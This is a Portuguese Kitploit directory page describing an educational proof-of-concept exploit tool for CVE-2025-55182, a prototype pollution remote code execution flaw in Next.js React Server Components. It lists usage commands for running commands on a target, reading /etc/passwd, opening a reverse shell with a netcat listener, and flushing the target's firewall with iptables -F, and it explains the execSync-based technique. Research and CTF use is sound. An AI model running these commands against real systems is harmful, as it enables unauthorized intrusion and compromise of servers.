Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WEB-CLI_RCE_React2Shell — WEB-CLI_RCE_React2Shell is an educational PoC exploit tool for CVE-2025-55182, a critical Prototype Pollution flaw in Next.js applications using React Server Components. Designed for CTFs and research, it features a single-command mode, an interactive web CLI, and reverse shell capabilities to demonstrate RCE. | Kitploit
Ferramentas/GitHubGitHub/raivenlockdown/web-cli_rce_react2shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRemote Access Tool

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

GitHub
raivenlockdown/web-cli_rce_react2shell

WEB-CLI_RCE_React2Shell

Ver Repositório
5há 2 mesesAinda não revisado

WEB-CLI_RCE_React2Shell is an educational PoC exploit tool for CVE-2025-55182, a critical Prototype Pollution flaw in Next.js applications using React Server Components. Designed for CTFs and research, it features a single-command mode, an interactive web CLI, and reverse shell capabilities to demonstrate RCE.

Compartilhar

REACT2SHELL

🎯 Visão Geral Rápida (O que é isso?)

Esta ferramenta é uma simples prova de conceito (PoC) de exploração para CVE-2025-55182. Esta é uma falha grave (Poluição de Protótipo) encontrada em aplicações Next.js que usam React Server Components.

Se um servidor alvo estiver vulnerável, este script permite executar comandos do sistema operacional nele (Execução Remota de Código, ou RCE).

Esta ferramenta foi construída para aprendizado, CTFs e pesquisa de segurança responsável.

Screenshot 2025-12-12 214115

⚠️ Aviso para Estudantes e Jogadores de CTF

USE ETICAMENTE. Execute este exploit apenas contra sistemas que você possui ou para os quais tenha permissão explícita e documentada para testar. O uso não autorizado é ilegal. Esta ferramenta é apenas para fins educacionais.

🌟 Como Usar

Esta ferramenta tem três formas principais de executar comandos: um comando único simples, um console web interativo completo e uma tentativa de um shell reverso clássico.

⚙️ Instalação

  1. Obtenha o código:

    root@kitploit:~
    git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
    cd REACT2SHELL
    
  2. Instale a biblioteca:

    root@kitploit:~
    pip install requests
    

Modo 1: Console Web Interativo (Recomendado para CTFs)

Esta é a forma mais fácil de interagir com o alvo. Inicia uma página web local na sua máquina que funciona como um terminal.

  1. Execute o script:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> --web-cli
    

    Exemplo: python3 exploit.py http://target.com/ --web-cli

  2. Abra seu navegador: O script dirá para abrir http://127.0.0.1:8000/. Você pode então digitar comandos (como ls, whoami, cat /etc/passwd) diretamente na página web.

Modo 2: Execução de Comando Único

Execute um comando e obtenha a saída imediatamente no seu terminal local. Bom para verificações rápidas como descobrir seu ID de usuário.

root@kitploit:~
python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

Exemplo: python3 exploit.py http://target.com/ --cmd 'id'

Modo 3: Tentativa de Shell Reverso

Use este modo se quiser uma conexão estável e persistente. Nota: Isto frequentemente falha em ambientes reais devido a firewalls (filtragem de saída).

  1. Inicie seu listener (ex.: netcat):

    root@kitploit:~
    nc -lvnp 55555
    
  2. Execute o exploit:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
    
    • -i <YOUR_IP>: O IP da sua máquina.
    • -p 55555: A porta que seu listener está usando.
    • --flush (Opcional): Tenta executar iptables -F no alvo primeiro para limpar firewalls do host.

🔬 Explicação Técnica (Como o Exploit Funciona)

O exploit usa uma falha de Poluição de Protótipo para alcançar RCE.

  1. Poluição de Protótipo: O script envia um payload especialmente criado para um endpoint Next.js vulnerável. Esse payload explora uma falha na forma como o servidor processa dados, permitindo adicionar propriedades à estrutura básica de objetos JavaScript (Object.prototype).
  2. Gatilho de RCE: Poluímos uma propriedade interna específica que controla qual código o servidor executa (usando child_process do Node.js). Substituímos o valor dessa propriedade pelo nosso comando shell.
  3. Captura de Saída: Ao executar comandos nos modos de comando único ou web CLI, o exploit faz o servidor executar o comando (execSync) e imediatamente lançar um erro inofensivo. A saída do comando é habilmente inserida no campo digest da mensagem de erro. O script Python então lê esse campo para obter os resultados.

🤝 Referências e Créditos

Esta pesquisa depende do trabalho inicial e divulgação pela comunidade de segurança. Agradecemos a todos os pesquisadores e contribuidores de código aberto.

📚 Referências Principais

  • Repositório PoC Original para CVE-2025-55182 - (A base para este exploit.)
  • Exemplo de Código PoC Original - (O exemplo de código inicial.)
  • Vulnerabilidade de Segurança Crítica em React Server Components - (Postagem oficial do blog React sobre o problema.)
  • Vulnerabilidade Crítica no React (CVE-2025-55182) - (Análise de segurança detalhada.)
  • Documentação de Funções de Servidor React - (Documentação oficial explicando o contexto de como os componentes vulneráveis funcionam.)
Baixar ferramenta